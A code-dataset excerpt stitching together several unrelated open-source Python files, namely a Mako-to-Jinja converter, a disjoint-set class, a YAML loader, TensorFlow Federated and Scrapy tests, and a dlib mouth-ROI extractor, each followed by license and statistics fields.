m_filter_u = filter_u.search(line)
if m_val:
line = val.sub(r'{{ \1 }}', line)
if m_filter_h:
line = filter_h.sub(r'|e', line)
if m_filter_striphtml:
line = filter_striphtml.sub(r'|e', line)
if m_filter_u:
line = filter_u.sub(r'|urlencode', line)
if m_func_len:
line = func_len.sub(r'\1|length', line)
# Macro start/end
m_macro_start = macro_start.search(line)
if m_macro_start:
line = m_macro_start.expand(r'\1{% macro \2 %}\3') + '\n'
m_macro_end = macro_end.search(line)
if m_macro_end:
line = m_macro_end.expand(r'\1{% endmacro %}\2') + '\n'
# Process line for single 'whole line' replacements
m_macro_start = macro_start.search(line)
m_macro_end = macro_end.search(line)
m_if_start = if_start.search(line)
m_if_else = if_else.search(line)
m_if_elif = if_elif.search(line)
m_if_end = if_end.search(line)
m_for_start = for_start.search(line)
m_for_end = for_end.search(line)
m_namspace = namespace.search(line)
m_inherit = inherit.search(line)
m_block_single_line = block_single_line.search(line)
m_block_start = block_start.search(line)
m_block_end = block_end.search(line)
m_comment_single_line = comment_single_line.search(line)
if m_comment_single_line:
output += m_comment_single_line.expand(r'{# \1 #}') + '\n'
elif m_if_start:
output += m_if_start.expand(r'\1{% if \2 %}\3') + '\n'
elif m_if_else:
output += m_if_else.expand(r'\1{% else %}\2') + '\n'
elif m_if_elif:
output += m_if_elif.expand(r'\1{% elif \2 %}\3') + '\n'
elif m_if_end:
output += m_if_end.expand(r'\1{% endif %}\2') + '\n'
elif m_for_start:
output += m_for_start.expand(r'\1{% for \2 %}\3') + '\n'
elif m_for_end:
output += m_for_end.expand(r'\1{% endfor %}\2') + '\n'
elif m_namspace:
output += m_namspace.expand(r"\1{% import '\3' as \2 with context %}\4") + '\n'
elif m_inherit:
output += m_inherit.expand(r"{% extends '\2' %}\3") + '\n'
elif m_block_single_line:
output += m_block_single_line.expand(r'\1{% block \2 %}\3{% endblock %}\4') + '\n'
elif m_block_start:
output += m_block_start.expand(r'\1{% block \2 %}\3') + '\n'
elif m_block_end:
output += m_block_end.expand(r'\1{% endblock %}\2') + '\n'
else:
# Doesn't match anything we're going to process, pass though
output += line
return output
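# For example, feeding mako2jinja() the Mako lines
#     % if post.title:
#         ${post.title|h}
#     % endif
# yields the Jinja2 lines
#     {% if post.title %}
#         {{ post.title|e }}
#     {% endif %}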
def jinjify_shortcodes(in_dir, out_dir):
for fname in os.listdir(in_dir):
if not fname.endswith('.tmpl'):
continue
in_file = os.path.join(in_dir, fname)
out_file = os.path.join(out_dir, fname)
with open(in_file) as inf:
data = mako2jinja(inf)
with open(out_file, 'w') as outf:
outf.write(data)
def usage():
print("Usage: python {} [in-dir] [out-dir]".format(sys.argv[0]))
print("OR")
print("Usage: python {} [in-file] [out-file]".format(sys.argv[0]))
if __name__ == "__main__":
if len(sys.argv) == 1:
print('Performing standard conversions:')
for m, j in (
('nikola/data/themes/base', 'nikola/data/themes/base-jinja'),
('nikola/data/themes/bootstrap3', 'nikola/data/themes/bootstrap3-jinja')
):
print(' {0} -> {1}'.format(m, j))
jinjify(m, j)
jinjify_shortcodes('nikola/data/shortcodes/mako', 'nikola/data/shortcodes/jinja')
elif len(sys.argv) != 3:
print('ERROR: needs input and output directory (file), or no arguments for default conversions.')
usage()
elif os.path.isdir(sys.argv[1]) and (os.path.isdir(sys.argv[2]) or not os.path.exists(sys.argv[2])):
jinjify(sys.argv[1], sys.argv[2])
elif os.path.isfile(sys.argv[1]) and (os.path.isfile(sys.argv[2]) or not os.path.exists(sys.argv[2])):
tmpdir = tempfile.mkdtemp()
indir = os.path.sep.join((tmpdir, 'in', 'templates'))
outdir = os.path.sep.join((tmpdir, 'out', 'templates'))
os.makedirs(indir)
shutil.copy(sys.argv[1], indir)
jinjify(os.path.dirname(indir), os.path.dirname(outdir))
shutil.move(os.path.sep.join((outdir, os.path.basename(sys.argv[1]))), sys.argv[2])
else:
print('ERROR: the two arguments must be both directories or files')
usage()
| mit | -3,567,311,414,146,262,500 | 35.700758 | 106 | 0.558056 | false |
aryrobocode/apothecary | apothecary/cs/ds/disjoint_set.py | 1 | 4291 | class DJset:
def __init__(self, size, start = 0):
"""
Creates a new disjoint set data structure
Args:
start: The starting index for all elements (e.g. 0 or 1)
size: The number of elements to be considered (i.e. last index)
Operations:
find: Finds the representative of the group the element belongs to
union: Merge 2 elements into a single group
group_size: Computes size of a group
group: Finds all elements in a group
rep: Find the representatives of all disjoint sets
"""
self.parent = [None] * (size + 1)
        self.size = [None] * (size + 1) # Doubles as the rank of an element
self.start = start
self.end = size
for i in range(self.end + 1):
self._init(i)
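    # A minimal usage sketch (element values below are illustrative only):
    #
    #   dsu = DJset(5, start=1)   # elements 1..5, each initially its own group
    #   dsu.union(1, 2)           # merge the groups containing 1 and 2
    #   dsu.union(2, 3)
    #   dsu.find(3)               # representative shared by 1, 2 and 3
    #   dsu.group_size(1)         # -> 3
    #   dsu.rep()                 # representatives of all remaining groups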
def _init(self, element):
self.parent[element] = element
self.size[element] = 1
def _oor(self, element):
return element < self.start or element > self.end
def find(self, element, visual = False, visual_string="Finding:\t"):
"""
Finds the representative of the group an element is in
Args:
element: Index of an element in the disjoint set
visual: Set to True for additional screen output
Returns:
Index of representative of group, -1 if not found (e.g. out of range)
Time:
O(1) [Amortized]
Explanation:
Recursively find representative with path compression
"""
if self._oor(element):
return -1
if self.parent[element] == element:
if visual:
print(visual_string + "{} [Found]".format(element))
return element
else:
if visual:
visual_string += "{} --> ".format(element)
self.parent[element] = self.find(self.parent[element], visual, visual_string)
return self.parent[element]
def group_size(self, element, visual = False):
"""
Finds the size of the group an element is in
Args:
element: Index of an element in the disjoint set
visual: Set to True for additional screen output
Returns:
Size of group element is in , -1 if not found (e.g. out of range)
Time:
O(1) [Amortized]
"""
if self._oor(element):
return -1
return self.size[self.find(element)]
def group(self, element, visual = False):
"""
Finds all group members of the group an element is in
Args:
element: Index of an element in the disjoint set
visual: Set to True for additional screen output
Returns:
A list of all group members, -1 if none found (e.g. out of range)
Time:
O(n)
Explanation:
Check each element to see if they share the same representative
"""
if self._oor(element):
return -1
result, parent = [], self.find(element)
for i in range(self.start, self.end + 1):
if self.find(i) == parent:
result.append(i)
if visual:
print("Group containing {}: {}".format(element, result))
return result
def rep(self, visual = False):
"""
Finds all representatives of the disjoint set
Args:
visual: Set to True for additional screen output
Returns:
A list of all representatives, -1 if not found (e.g. out of range)
Time:
O(n)
Explanation:
Find all elements who represent themselves
"""
result = []
for i in range(self.start, self.end + 1):
if self.find(i) == i:
if visual:
print("[{}, Size {}]".format(i, self.group_size(i)))
result.append(i)
return result
def union(self, elem_x, elem_y, visual = False):
"""
Attempts to join 2 group belonging to 2 elements
Args:
elem_x: Index of an 1st element in the disjoint set
elem_y: Index of an 2nd element in the disjoint set
visual: Set to True for additional screen output
Time:
O(1) [Amortized]
Explanation:
            Point the representative of the smaller group at the
            representative of the larger group (union by size)
Path compression in find() automatically updates the rest
"""
if self._oor(elem_x) or self._oor(elem_y):
if visual:
print("Union unsuccessful: index out of range")
return
x_parent = self.find(elem_x)
y_parent = self.find(elem_y)
if x_parent == y_parent:
if visual:
print("Union unsuccessful: {} and {} in same group".format(elem_x, elem_y, x_parent))
return
if self.size[x_parent] < self.size[y_parent]:
self.parent[x_parent] = y_parent
self.size[y_parent] += self.size[x_parent]
else:
self.parent[y_parent] = x_parent
self.size[x_parent] += self.size[y_parent] | mit | 285,275,668,632,747,780 | 24.547619 | 89 | 0.669075 | false |
toumorokoshi/miura | miura/data.py | 1 | 2224 | import os
import re
import yaml
from .exceptions import MiuraException
import logging
logger = logging.getLogger(__name__)
def load_data_from_path(path):
file_paths = load_file_or_directory(path)
return retrieve_data(file_paths)
def load_file_or_directory(path):
"""
given a path, determine if the path is a file or directory, and
yield a list of absolute file paths
"""
assert os.path.exists(path), "{0} does not exist!".format(path)
absolute_path = os.path.abspath(path)
if not os.path.isdir(path):
yield absolute_path
else:
for root, dirs, file_paths in os.walk(path):
for file_path in file_paths:
yield os.path.join(root, file_path)
def retrieve_data(file_paths):
"""
passed an iterable list of file_paths, loop through all of them and
generate a dictionary containing all the context
"""
data_dict = {}
for file_path in file_paths:
with open(file_path) as fh:
try:
content = yaml.load(fh.read())
except yaml.YAMLError as e:
raise MiuraException(
"Unable to parse yaml at {0}: \n {1}".format(
file_path,
str(e)
))
if not isinstance(content, dict):
raise MiuraException(
"{0} is does not translate to a dictionary!".format(file_path)
)
data_dict.update(content)
return data_dict
def filter_data(data, filter_dict):
""" filter a data dictionary for values only matching the filter """
for key, match_string in filter_dict.items():
if key not in data:
logger.warning("{0} doesn't match a top level key".format(key))
continue
values = data[key]
matcher = re.compile(match_string)
if isinstance(values, list):
values = [v for v in values if matcher.search(v)]
elif isinstance(values, dict):
values = dict((k, v) for k, v in values.items() if matcher.search(k))
else:
raise MiuraException("cannot filter a {0}".format(type(values)))
data[key] = values
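if __name__ == '__main__':
    # Small demo of filter_data on in-memory data (values are illustrative only);
    # run as ``python -m miura.data`` so the relative imports above resolve.
    sample = {'hosts': ['web-1', 'web-2', 'db-1'],
              'roles': {'web-1': 'frontend', 'db-1': 'database'}}
    filter_data(sample, {'hosts': '^web-', 'roles': '^db-'})
    print(sample)  # {'hosts': ['web-1', 'web-2'], 'roles': {'db-1': 'database'}}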
| mit | -9,030,993,943,274,022,000 | 31.231884 | 82 | 0.582284 | false |
tensorflow/federated | tensorflow_federated/python/simulation/datasets/client_data_test.py | 1 | 13504 | # Copyright 2018, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Union
import warnings
from absl.testing import parameterized
import tensorflow as tf
from tensorflow_federated.python.core.api import computations
from tensorflow_federated.python.core.backends.native import execution_contexts
from tensorflow_federated.python.simulation.datasets import client_data as cd
def create_concrete_client_data(
serializable: bool = False,
) -> Union[cd.ConcreteSerializableClientData, cd.ConcreteClientData]:
"""Creates a simple `ConcreteSerializableClientData` instance.
The resulting `ClientData` has the following clients and datasets (written as
lists):
* client `1`: [0]
* client `2`: [0, 1]
* client `3`: [0, 1, 2]
Args:
serializable: A boolean indicating whether to create a `ConcreteClientData`
(`serializable = False`) or a `ConcreteSerializableClientData`
(`serializable = True`).
Returns:
A `ConcreteSerializableClientData` instance.
"""
client_ids = ['1', '2', '3']
def create_dataset_fn(client_id):
num_examples = tf.strings.to_number(client_id, out_type=tf.int64)
return tf.data.Dataset.range(num_examples)
if serializable:
concrete_client_data = cd.ClientData.from_clients_and_tf_fn(
client_ids=client_ids, serializable_dataset_fn=create_dataset_fn)
else:
concrete_client_data = cd.ClientData.from_clients_and_fn(
client_ids=client_ids,
create_tf_dataset_for_client_fn=create_dataset_fn)
return concrete_client_data
def dataset_length(dataset):
return dataset.reduce(0, lambda x, _: x + 1)
class TrainTestClientSplitTest(tf.test.TestCase):
def get_even_odd_client_data(self):
"""Creates a `ClientData` where only clients with even IDs have data."""
def create_dataset_fn(client_id):
client_id_as_int = tf.strings.to_number(client_id, out_type=tf.int64)
num_examples = 1 if client_id_as_int % 2 == 0 else 0
return tf.data.Dataset.range(num_examples)
client_ids = [str(x) for x in range(10)]
return cd.ClientData.from_clients_and_tf_fn(
client_ids=client_ids, serializable_dataset_fn=create_dataset_fn)
def test_split_train_test_selects_nonempty_test_clients(self):
# Only even client_ids have data:
client_data = self.get_even_odd_client_data()
train, test = cd.ClientData.train_test_client_split(
client_data, num_test_clients=3)
# Test that all clients end up in one of the two ClientData:
self.assertCountEqual(client_data.client_ids,
train.client_ids + test.client_ids)
self.assertLen(test.client_ids, 3)
for client_id in test.client_ids:
self.assertEqual(int(client_id) % 2, 0)
train, test = cd.ClientData.train_test_client_split(
client_data, num_test_clients=5)
self.assertLen(test.client_ids, 5)
self.assertLen(train.client_ids, 5)
def test_split_train_test_not_enough_nonempty_clients(self):
client_data = self.get_even_odd_client_data()
with self.assertRaisesRegex(ValueError, 'too many clients with no data.'):
cd.ClientData.train_test_client_split(client_data, num_test_clients=6)
def test_split_train_test_too_few_clients(self):
client_data = self.get_even_odd_client_data()
with self.assertRaisesRegex(ValueError, 'has only 10 clients.*11'):
cd.ClientData.train_test_client_split(client_data, num_test_clients=11)
def test_split_train_test_no_test_clients_requested(self):
client_data = self.get_even_odd_client_data()
with self.assertRaisesRegex(ValueError, 'Please specify'):
cd.ClientData.train_test_client_split(client_data, num_test_clients=0)
def test_split_train_test_fixed_seed(self):
client_data = self.get_even_odd_client_data()
train_0, test_0 = cd.ClientData.train_test_client_split(
client_data, num_test_clients=3, seed=0)
train_1, test_1 = cd.ClientData.train_test_client_split(
client_data, num_test_clients=3, seed=0)
self.assertEqual(train_0.client_ids, train_1.client_ids)
self.assertEqual(test_0.client_ids, test_1.client_ids)
class ConcreteClientDataTest(tf.test.TestCase, parameterized.TestCase):
def test_deprecation_warning_raised_on_from_clients_and_fn(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
create_concrete_client_data(serializable=False)
self.assertNotEmpty(w)
self.assertEqual(w[0].category, DeprecationWarning)
self.assertRegex(
str(w[0].message),
'tff.simulation.datasets.ClientData.from_clients_and_fn is deprecated'
)
@parameterized.named_parameters(('nonserializable', False),
('serializable', True))
def test_concrete_client_data_create_expected_datasets(self, serializable):
client_data = create_concrete_client_data(serializable=serializable)
self.assertEqual(client_data.element_type_structure,
tf.TensorSpec(shape=(), dtype=tf.int64))
for i in client_data.client_ids:
client_dataset = client_data.create_tf_dataset_for_client(i)
self.assertEqual(dataset_length(client_dataset), int(i))
@parameterized.named_parameters(('nonserializable', False),
('serializable', True))
def test_datasets_lists_all_elements(self, serializable):
client_data = create_concrete_client_data(serializable=serializable)
def ds_iterable_to_list_set(datasets):
return set(tuple(ds.as_numpy_iterator()) for ds in datasets)
datasets = ds_iterable_to_list_set(client_data.datasets())
expected = ds_iterable_to_list_set(
(client_data.create_tf_dataset_for_client(cid)
for cid in client_data.client_ids))
self.assertEqual(datasets, expected)
@parameterized.named_parameters(('nonserializable', False),
('serializable', True))
def test_datasets_is_lazy(self, serializable):
client_ids = [1, 2, 3]
# Note: this is called once on initialization of ClientData
# with client_ids[0] in order to get the element type.
# After that, it should be called lazily when `next` is called
# on a `.datasets()` iterator.
called_count = 0
def only_call_me_thrice(client_id):
nonlocal called_count
called_count += 1
if called_count == 1:
self.assertEqual(client_id, client_ids[0])
if called_count > 3:
raise Exception('called too many times')
num_examples = client_id
return tf.data.Dataset.range(num_examples)
if serializable:
client_data = cd.ClientData.from_clients_and_tf_fn(
client_ids=client_ids, serializable_dataset_fn=only_call_me_thrice)
else:
client_data = cd.ClientData.from_clients_and_fn(
client_ids=client_ids,
create_tf_dataset_for_client_fn=only_call_me_thrice)
datasets_iter = client_data.datasets()
next(datasets_iter)
next(datasets_iter)
with self.assertRaisesRegex(Exception, 'called too many times'):
next(datasets_iter)
@parameterized.named_parameters(('nonserializable', False),
('serializable', True))
def test_datasets_limit_count(self, serializable):
client_data = create_concrete_client_data(serializable=serializable)
dataset_list = list(client_data.datasets(limit_count=1))
self.assertLen(dataset_list, 1)
@parameterized.named_parameters(('nonserializable', False),
('serializable', True))
def test_datasets_doesnt_shuffle_client_ids_list(self, serializable):
client_data = create_concrete_client_data(serializable=serializable)
client_ids_copy = client_data.client_ids.copy()
client_data.datasets()
self.assertEqual(client_data.client_ids, client_ids_copy)
client_data.datasets()
self.assertEqual(client_data.client_ids, client_ids_copy)
client_data.datasets()
self.assertEqual(client_data.client_ids, client_ids_copy)
@parameterized.named_parameters(('nonserializable', False),
('serializable', True))
def test_create_tf_dataset_from_all_clients(self, serializable):
client_data = create_concrete_client_data(serializable=serializable)
dataset = client_data.create_tf_dataset_from_all_clients()
dataset_list = list(dataset.as_numpy_iterator())
self.assertCountEqual(dataset_list, [0, 0, 0, 1, 1, 2])
class ConcreteSerializableClientDataTest(tf.test.TestCase):
def test_dataset_computation_lists_all_elements(self):
client_data = create_concrete_client_data(serializable=True)
for client_id in client_data.client_ids:
expected_values = list(range(int(client_id)))
client_dataset = client_data.dataset_computation(client_id)
actual_values = list(client_dataset.as_numpy_iterator())
self.assertEqual(expected_values, actual_values)
def test_dataset_from_large_client_list(self):
client_ids = [str(x) for x in range(1_000_000)]
def create_dataset(_):
return tf.data.Dataset.range(100)
client_data = cd.ClientData.from_clients_and_tf_fn(
client_ids=client_ids, serializable_dataset_fn=create_dataset)
# Ensure this completes within the test timeout without raising error.
# Previous implementations caused this to take an very long time via Python
# list -> generator -> list transformations.
try:
client_data.create_tf_dataset_from_all_clients(seed=42)
except Exception as e: # pylint: disable=broad-except
self.fail(e)
class PreprocessClientDataTest(tf.test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(('nonserializable', False),
('serializable', True))
def test_preprocess_creates_expected_client_datasets(self, serializable):
client_data = create_concrete_client_data(serializable=serializable)
def preprocess_fn(dataset):
return dataset.map(lambda x: 2 * x)
preprocess_client_data = client_data.preprocess(preprocess_fn)
for client_id in client_data.client_ids:
expected_dataset = [2 * a for a in range(int(client_id))]
actual_dataset = preprocess_client_data.create_tf_dataset_for_client(
client_id)
self.assertEqual(expected_dataset,
list(actual_dataset.as_numpy_iterator()))
@parameterized.named_parameters(('nonserializable', False),
('serializable', True))
def test_preprocess_with_take_one(self, serializable):
client_data = create_concrete_client_data(serializable=serializable)
preprocess_fn = lambda x: x.take(1)
preprocess_client_data = client_data.preprocess(preprocess_fn)
for client_id in client_data.client_ids:
dataset = preprocess_client_data.create_tf_dataset_for_client(client_id)
self.assertEqual(dataset_length(dataset), 1)
self.assertLen(
client_data.client_ids,
dataset_length(
preprocess_client_data.create_tf_dataset_from_all_clients()))
def test_preprocess_creates_expected_client_datasets_with_dataset_comp(self):
# We only use `serializable=True`, since it has a `dataset_computation`
# attribute.
client_data = create_concrete_client_data(serializable=True)
def preprocess_fn(dataset):
return dataset.map(lambda x: 2 * x)
preprocess_client_data = client_data.preprocess(preprocess_fn)
for client_id in client_data.client_ids:
expected_dataset = [2 * a for a in range(int(client_id))]
actual_dataset = preprocess_client_data.dataset_computation(client_id)
self.assertEqual(expected_dataset,
list(actual_dataset.as_numpy_iterator()))
@parameterized.named_parameters(('nonserializable', False),
('serializable', True))
def test_preprocess_creates_expected_amalgamated_dataset(self, serializable):
client_data = create_concrete_client_data(serializable=serializable)
def preprocess_fn(dataset):
return dataset.map(lambda x: 2 * x)
preprocess_client_data = client_data.preprocess(preprocess_fn)
expected_amalgamated_dataset = [0, 0, 2, 0, 2, 4]
actual_amalgamated_dataset = (
preprocess_client_data.create_tf_dataset_from_all_clients())
self.assertCountEqual(expected_amalgamated_dataset,
list(actual_amalgamated_dataset.as_numpy_iterator()))
@parameterized.named_parameters(('nonserializable', False),
('serializable', True))
def test_preprocess_raises_on_tff_computation(self, serializable):
client_data = create_concrete_client_data(serializable=serializable)
@computations.tf_computation
def foo():
return 1
with self.assertRaises(cd.IncompatiblePreprocessFnError):
client_data.preprocess(foo)
if __name__ == '__main__':
execution_contexts.set_local_execution_context()
tf.test.main()
| apache-2.0 | 6,593,200,390,063,470,000 | 39.797583 | 80 | 0.693868 | false |
georgesterpu/pyVSR | pyVSR/Features/roi.py | 1 | 9014 | from .feature import Feature
from urllib import request
import os
import cv2
import dlib
import numpy as np
from .. import utils
class ROIFeature(Feature):
r"""
Mouth ROI Extraction pipeline using OpenCV and dlib
Similar functionality, but without facial alignment, exists in DCTFeature. It will
soon get deprecated.
Main steps:
1) face detection - dlib mmod cnn
2) face alignment - dlib 5 landmark prediction, alignment and cropping
3) face shape prediction - dlib 68 landmark prediction
4) mouth cropping - segment the aligned face around the lip coordinates (landmarks [48:68])
"""
def __init__(self,
extract_opts=None):
r"""
Parameters
----------
extract_opts : `dict` holding the configuration for feature extraction
Must specify the following options:
``gpu`` : `boolean`, whether to use the dlib's CNN-based face detector (`True`)
or the traditional dlib HOG-based face detector (`False`)
``align``: `boolean`, if True (default), it uses dlib face alignment based on 5
stable landmarks
``color`` : `boolean`, store RGB images (`True`) or grayscale images (`False`)
``border`` : `int`, number of pixels to pad the tightly-cropped mouth region
``window_size`` : `tuple` of two `ints`, one for each image dimension (width, height)
              Represents the fixed output size that every cropped mouth ROI is resized to
"""
# if extract_opts is not None:
# if 'need_coords' in extract_opts:
# self._need_coords = extract_opts['need_coords']
if 'window_size' not in extract_opts:
raise Exception('window_size is mandatory')
self._xres = extract_opts['window_size'][0]
self._yres = extract_opts['window_size'][1]
if 'align' in extract_opts:
self._align = extract_opts['align']
else:
self._align = True
        if 'color' in extract_opts:
            self._channels = 3 if extract_opts['color'] is True else 1
        else:
            self._channels = 1
if 'border' in extract_opts:
self._border = extract_opts['border']
else:
self._border = 0
        if 'gpu' in extract_opts:
            self._gpu = extract_opts['gpu']
        else:
            self._gpu = False
self._detector_path, self._predictor5_path, self._predictor68_path = maybe_download_models()
def extract_save_features(self, example):
r"""
Parameters
----------
        example : `tuple` of two `str`, the input video file path followed by the output feature file path
Returns
-------
"""
# Not all the fitters are pickleable for multiprocessing to work
# thus load the fitters for every process
# outfile = utils.file_to_feature(file, extension='.h5', tree_leaves=self._tree_leaves)
# if os.path.isfile(os.path.join(self._output_dir, outfile)):
# return
input_file = example[0]
output_file = example[1]
if os.path.isfile(output_file):
return
print(input_file)
self._preload_dlib_detector_fitter()
roi_sequence = self.extract_roi_sequence(input_file)
_write_sequence_to_file(output_file, roi_sequence, 'sequence', (None, None, None, None))
def extract_roi_sequence(self, file):
stream = cv2.VideoCapture(file)
vidframes = int(stream.get(cv2.CAP_PROP_FRAME_COUNT))
roi_seq = np.zeros((vidframes, self._yres, self._xres, self._channels), dtype=np.float32)
current_frame = 0
while stream.isOpened():
ret, frame = stream.read()
if ret is False:
break
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) # dlib and opencv use different channel representations
detections = self._detect(frame, 0)
if len(detections) > 0: # else the buffer will preserve the zeros initialisation
bbox = detections[0]
left, top, right, bottom = _get_bbox_corners(bbox, frame.shape, self._gpu)
# print(left, top, right, bottom, frame.shape)
if self._align is True:
face_coords = dlib.rectangle(left, top, right, bottom)
landmarks5 = self._fitter5(frame, face_coords)
face_img = dlib.get_face_chip(frame, landmarks5, 256)
face_img = np.asarray(face_img)
else:
face_img = frame[top:bottom, left:right]
face_img = cv2.resize(face_img, (160, 160), interpolation=cv2.INTER_CUBIC)
face_chip_area = dlib.rectangle(0, 0, face_img.shape[0], face_img.shape[1])
landmarks68 = self._fitter68(face_img, face_chip_area)
arr = _dlib_parts_to_numpy(landmarks68)[48:68]
top_left, bottom_right = _get_array_bounds(arr, face_img.shape, border=self._border)
mouth_crop = face_img[top_left[1]:bottom_right[1], top_left[0]:bottom_right[0], :]
mouth_crop_resized = cv2.resize(mouth_crop, (self._xres, self._yres), cv2.INTER_AREA)
if self._channels == 3:
roi_seq[current_frame, :] = cv2.cvtColor(mouth_crop_resized, cv2.COLOR_RGB2BGR) / 255
else:
gray_roi = cv2.cvtColor(mouth_crop_resized, cv2.COLOR_RGB2GRAY) / 255
roi_seq[current_frame, :] = np.expand_dims(gray_roi, -1)
# # Enable these when debugging # #
# cv2.imshow('', roi_seq[current_frame, :])
# cv2.waitKey(1)
current_frame += 1
stream.release()
# cv2.destroyAllWindows()
return roi_seq
def _preload_dlib_detector_fitter(self):
r"""
Returns the dlib face detector and the landmark fitters (5 and 68 landmarks)
-------
"""
if self._gpu is True:
self._detect = dlib.cnn_face_detection_model_v1(self._detector_path)
else:
self._detect = dlib.get_frontal_face_detector()
self._fitter5 = dlib.shape_predictor(self._predictor5_path)
self._fitter68 = dlib.shape_predictor(self._predictor68_path)
def get_feature(self, file, feat_opts):
pass
def _write_sequence_to_file(file, seq, seq_name, seq_shape):
import h5py
os.makedirs(os.path.dirname(file), exist_ok=True)
f = h5py.File(file, 'w')
f.create_dataset(seq_name, data=seq.astype('float32'),
maxshape=seq_shape,
compression="gzip",
fletcher32=True)
f.close()
return
def maybe_download_models():
r"""
-------
"""
os.makedirs('./stored_models/', exist_ok=True)
face_detector = 'https://github.com/georgesterpu/stored_models/raw/master/mmod_human_face_detector.dat'
lm_predictor_5 = 'https://github.com/georgesterpu/stored_models/raw/master/shape_predictor_5_face_landmarks.dat'
lm_predictor_68 = 'https://github.com/georgesterpu/stored_models/raw/master/shape_predictor_68_face_landmarks.dat'
detector_path = './stored_models/detector.dat'
if not os.path.isfile(detector_path):
print('Downloading face detector')
request.urlretrieve(face_detector, detector_path)
predictor5_path = './stored_models/predictor5.dat'
if not os.path.isfile(predictor5_path):
print('Downloading landmark predictor5')
request.urlretrieve(lm_predictor_5, predictor5_path)
predictor68_path = './stored_models/predictor68.dat'
if not os.path.isfile(predictor68_path):
print('Downloading landmark predictor68')
request.urlretrieve(lm_predictor_68, predictor68_path)
return detector_path, predictor5_path, predictor68_path
def _dlib_parts_to_numpy(landmarks):
parts = landmarks.parts()
arr = []
for part in parts:
arr.append((part.x, part.y))
return np.asarray(arr)
def _get_array_bounds(arr, outer_shape, border=0):
# TODO : make border padding relative to bbox size
top_left = np.min(arr, axis=0)
bottom_right = np.max(arr, axis=0)
top_left[0] = np.maximum(top_left[0] - border, 0)
top_left[1] = np.maximum(top_left[1] - border, 0)
bottom_right[0] = np.minimum(bottom_right[0] + border, outer_shape[0])
bottom_right[1] = np.minimum(bottom_right[1] + border, outer_shape[1])
return tuple(top_left), tuple(bottom_right)
def _get_bbox_corners(bbox, frame_shape, gpu):
if gpu is True:
left, top, right, bottom = bbox.rect.left(), bbox.rect.top(), bbox.rect.right(), bbox.rect.bottom()
else:
left, top, right, bottom = bbox.left(), bbox.top(), bbox.right(), bbox.bottom()
# clip values
left, top = (np.maximum(left, 0), np.maximum(top, 0))
right, bottom = (np.minimum(right, frame_shape[1]), np.minimum(bottom, frame_shape[0]))
return left, top, right, bottom
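# A minimal usage sketch (the file names and option values below are hypothetical):
#
#   feat = ROIFeature(extract_opts={'window_size': (36, 36), 'color': True,
#                                   'align': True, 'border': 10, 'gpu': False})
#   feat.extract_save_features(('clips/speaker01.mp4', 'features/speaker01.h5'))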
| gpl-3.0 | -8,871,520,345,047,346,000 | 34.34902 | 118 | 0.59929 | false |
eLRuLL/scrapy | tests/test_spidermiddleware_offsite.py | 1 | 3154 | from unittest import TestCase
from urllib.parse import urlparse
import warnings
from scrapy.http import Response, Request
from scrapy.spiders import Spider
from scrapy.spidermiddlewares.offsite import OffsiteMiddleware, URLWarning
from scrapy.utils.test import get_crawler
class TestOffsiteMiddleware(TestCase):
def setUp(self):
crawler = get_crawler(Spider)
self.spider = crawler._create_spider(**self._get_spiderargs())
self.mw = OffsiteMiddleware.from_crawler(crawler)
self.mw.spider_opened(self.spider)
def _get_spiderargs(self):
return dict(name='foo', allowed_domains=['scrapytest.org', 'scrapy.org', 'scrapy.test.org'])
def test_process_spider_output(self):
res = Response('http://scrapytest.org')
onsite_reqs = [Request('http://scrapytest.org/1'),
Request('http://scrapy.org/1'),
Request('http://sub.scrapy.org/1'),
Request('http://offsite.tld/letmepass', dont_filter=True),
Request('http://scrapy.test.org/')]
offsite_reqs = [Request('http://scrapy2.org'),
Request('http://offsite.tld/'),
Request('http://offsite.tld/scrapytest.org'),
Request('http://offsite.tld/rogue.scrapytest.org'),
Request('http://rogue.scrapytest.org.haha.com'),
Request('http://roguescrapytest.org'),
Request('http://test.org/'),
Request('http://notscrapy.test.org/')]
reqs = onsite_reqs + offsite_reqs
out = list(self.mw.process_spider_output(res, reqs, self.spider))
self.assertEqual(out, onsite_reqs)
class TestOffsiteMiddleware2(TestOffsiteMiddleware):
def _get_spiderargs(self):
return dict(name='foo', allowed_domains=None)
def test_process_spider_output(self):
res = Response('http://scrapytest.org')
reqs = [Request('http://a.com/b.html'), Request('http://b.com/1')]
out = list(self.mw.process_spider_output(res, reqs, self.spider))
self.assertEqual(out, reqs)
class TestOffsiteMiddleware3(TestOffsiteMiddleware2):
    def _get_spiderargs(self):
        return dict(name='foo')
class TestOffsiteMiddleware4(TestOffsiteMiddleware3):
    def _get_spiderargs(self):
bad_hostname = urlparse('http:////scrapytest.org').hostname
return dict(name='foo', allowed_domains=['scrapytest.org', None, bad_hostname])
def test_process_spider_output(self):
res = Response('http://scrapytest.org')
reqs = [Request('http://scrapytest.org/1')]
out = list(self.mw.process_spider_output(res, reqs, self.spider))
self.assertEqual(out, reqs)
class TestOffsiteMiddleware5(TestOffsiteMiddleware4):
def test_get_host_regex(self):
self.spider.allowed_domains = ['http://scrapytest.org', 'scrapy.org', 'scrapy.test.org']
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.mw.get_host_regex(self.spider)
assert issubclass(w[-1].category, URLWarning)
| bsd-3-clause | 6,963,903,261,428,702,000 | 37.463415 | 100 | 0.630945 | false |
EmanueleCannizzaro/scons | test/implicit-cache/SetOption.py | 1 | 2207 | #!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
